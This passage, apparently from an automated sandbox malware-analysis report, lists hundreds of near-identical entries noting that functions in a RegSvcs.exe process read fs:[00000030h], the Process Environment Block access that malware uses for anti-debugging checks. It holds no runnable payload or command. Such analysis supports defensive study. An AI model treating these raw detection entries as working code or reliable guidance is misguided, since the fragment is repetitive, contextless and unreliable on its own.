            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01584180 mov eax, dword ptr fs:[00000030h]6_2_01584180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA197 mov eax, dword ptr fs:[00000030h]6_2_014DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA197 mov eax, dword ptr fs:[00000030h]6_2_014DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA197 mov eax, dword ptr fs:[00000030h]6_2_014DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566050 mov eax, dword ptr fs:[00000030h]6_2_01566050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E2050 mov eax, dword ptr fs:[00000030h]6_2_014E2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150C073 mov eax, dword ptr fs:[00000030h]6_2_0150C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01564000 mov ecx, dword ptr fs:[00000030h]6_2_01564000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01582000 mov eax, dword ptr fs:[00000030h]6_2_01582000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE016 mov eax, dword ptr fs:[00000030h]6_2_014FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE016 mov eax, dword ptr fs:[00000030h]6_2_014FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE016 mov eax, dword ptr fs:[00000030h]6_2_014FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE016 mov eax, dword ptr fs:[00000030h]6_2_014FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576030 mov eax, dword ptr fs:[00000030h]6_2_01576030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA020 mov eax, dword ptr fs:[00000030h]6_2_014DA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DC020 mov eax, dword ptr fs:[00000030h]6_2_014DC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015620DE mov eax, dword ptr fs:[00000030h]6_2_015620DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015220F0 mov ecx, dword ptr fs:[00000030h]6_2_015220F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E80E9 mov eax, dword ptr fs:[00000030h]6_2_014E80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA0E3 mov ecx, dword ptr fs:[00000030h]6_2_014DA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015660E0 mov eax, dword ptr fs:[00000030h]6_2_015660E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DC0F0 mov eax, dword ptr fs:[00000030h]6_2_014DC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E208A mov eax, dword ptr fs:[00000030h]6_2_014E208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A60B8 mov eax, dword ptr fs:[00000030h]6_2_015A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A60B8 mov ecx, dword ptr fs:[00000030h]6_2_015A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015780A8 mov eax, dword ptr fs:[00000030h]6_2_015780A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AA352 mov eax, dword ptr fs:[00000030h]6_2_015AA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01588350 mov ecx, dword ptr fs:[00000030h]6_2_01588350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156035C mov eax, dword ptr fs:[00000030h]6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156035C mov eax, dword ptr fs:[00000030h]6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156035C mov eax, dword ptr fs:[00000030h]6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156035C mov ecx, dword ptr fs:[00000030h]6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156035C mov eax, dword ptr fs:[00000030h]6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156035C mov eax, dword ptr fs:[00000030h]6_2_0156035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01562349 mov eax, dword ptr fs:[00000030h]6_2_01562349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158437C mov eax, dword ptr fs:[00000030h]6_2_0158437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01500310 mov ecx, dword ptr fs:[00000030h]6_2_01500310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A30B mov eax, dword ptr fs:[00000030h]6_2_0151A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A30B mov eax, dword ptr fs:[00000030h]6_2_0151A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A30B mov eax, dword ptr fs:[00000030h]6_2_0151A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DC310 mov ecx, dword ptr fs:[00000030h]6_2_014DC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E3DB mov eax, dword ptr fs:[00000030h]6_2_0158E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E3DB mov eax, dword ptr fs:[00000030h]6_2_0158E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E3DB mov ecx, dword ptr fs:[00000030h]6_2_0158E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E3DB mov eax, dword ptr fs:[00000030h]6_2_0158E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015843D4 mov eax, dword ptr fs:[00000030h]6_2_015843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015843D4 mov eax, dword ptr fs:[00000030h]6_2_015843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h]6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h]6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h]6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h]6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h]6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA3C0 mov eax, dword ptr fs:[00000030h]6_2_014EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E83C0 mov eax, dword ptr fs:[00000030h]6_2_014E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E83C0 mov eax, dword ptr fs:[00000030h]6_2_014E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E83C0 mov eax, dword ptr fs:[00000030h]6_2_014E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E83C0 mov eax, dword ptr fs:[00000030h]6_2_014E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159C3CD mov eax, dword ptr fs:[00000030h]6_2_0159C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015663C0 mov eax, dword ptr fs:[00000030h]6_2_015663C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F03E9 mov eax, dword ptr fs:[00000030h]6_2_014F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015163FF mov eax, dword ptr fs:[00000030h]6_2_015163FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE3F0 mov eax, dword ptr fs:[00000030h]6_2_014FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE3F0 mov eax, dword ptr fs:[00000030h]6_2_014FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE3F0 mov eax, dword ptr fs:[00000030h]6_2_014FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE388 mov eax, dword ptr fs:[00000030h]6_2_014DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE388 mov eax, dword ptr fs:[00000030h]6_2_014DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE388 mov eax, dword ptr fs:[00000030h]6_2_014DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D8397 mov eax, dword ptr fs:[00000030h]6_2_014D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D8397 mov eax, dword ptr fs:[00000030h]6_2_014D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D8397 mov eax, dword ptr fs:[00000030h]6_2_014D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150438F mov eax, dword ptr fs:[00000030h]6_2_0150438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150438F mov eax, dword ptr fs:[00000030h]6_2_0150438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159A250 mov eax, dword ptr fs:[00000030h]6_2_0159A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159A250 mov eax, dword ptr fs:[00000030h]6_2_0159A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01568243 mov eax, dword ptr fs:[00000030h]6_2_01568243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01568243 mov ecx, dword ptr fs:[00000030h]6_2_01568243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6259 mov eax, dword ptr fs:[00000030h]6_2_014E6259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DA250 mov eax, dword ptr fs:[00000030h]6_2_014DA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D826B mov eax, dword ptr fs:[00000030h]6_2_014D826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01590274 mov eax, dword ptr fs:[00000030h]6_2_01590274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4260 mov eax, dword ptr fs:[00000030h]6_2_014E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4260 mov eax, dword ptr fs:[00000030h]6_2_014E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4260 mov eax, dword ptr fs:[00000030h]6_2_014E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D823B mov eax, dword ptr fs:[00000030h]6_2_014D823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA2C3 mov eax, dword ptr fs:[00000030h]6_2_014EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02E1 mov eax, dword ptr fs:[00000030h]6_2_014F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02E1 mov eax, dword ptr fs:[00000030h]6_2_014F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02E1 mov eax, dword ptr fs:[00000030h]6_2_014F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560283 mov eax, dword ptr fs:[00000030h]6_2_01560283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560283 mov eax, dword ptr fs:[00000030h]6_2_01560283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560283 mov eax, dword ptr fs:[00000030h]6_2_01560283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E284 mov eax, dword ptr fs:[00000030h]6_2_0151E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E284 mov eax, dword ptr fs:[00000030h]6_2_0151E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02A0 mov eax, dword ptr fs:[00000030h]6_2_014F02A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F02A0 mov eax, dword ptr fs:[00000030h]6_2_014F02A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov ecx, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015762A0 mov eax, dword ptr fs:[00000030h]6_2_015762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8550 mov eax, dword ptr fs:[00000030h]6_2_014E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8550 mov eax, dword ptr fs:[00000030h]6_2_014E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151656A mov eax, dword ptr fs:[00000030h]6_2_0151656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151656A mov eax, dword ptr fs:[00000030h]6_2_0151656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151656A mov eax, dword ptr fs:[00000030h]6_2_0151656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576500 mov eax, dword ptr fs:[00000030h]6_2_01576500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4500 mov eax, dword ptr fs:[00000030h]6_2_015B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E53E mov eax, dword ptr fs:[00000030h]6_2_0150E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0535 mov eax, dword ptr fs:[00000030h]6_2_014F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A5D0 mov eax, dword ptr fs:[00000030h]6_2_0151A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A5D0 mov eax, dword ptr fs:[00000030h]6_2_0151A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E5CF mov eax, dword ptr fs:[00000030h]6_2_0151E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E5CF mov eax, dword ptr fs:[00000030h]6_2_0151E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E65D0 mov eax, dword ptr fs:[00000030h]6_2_014E65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E25E0 mov eax, dword ptr fs:[00000030h]6_2_014E25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
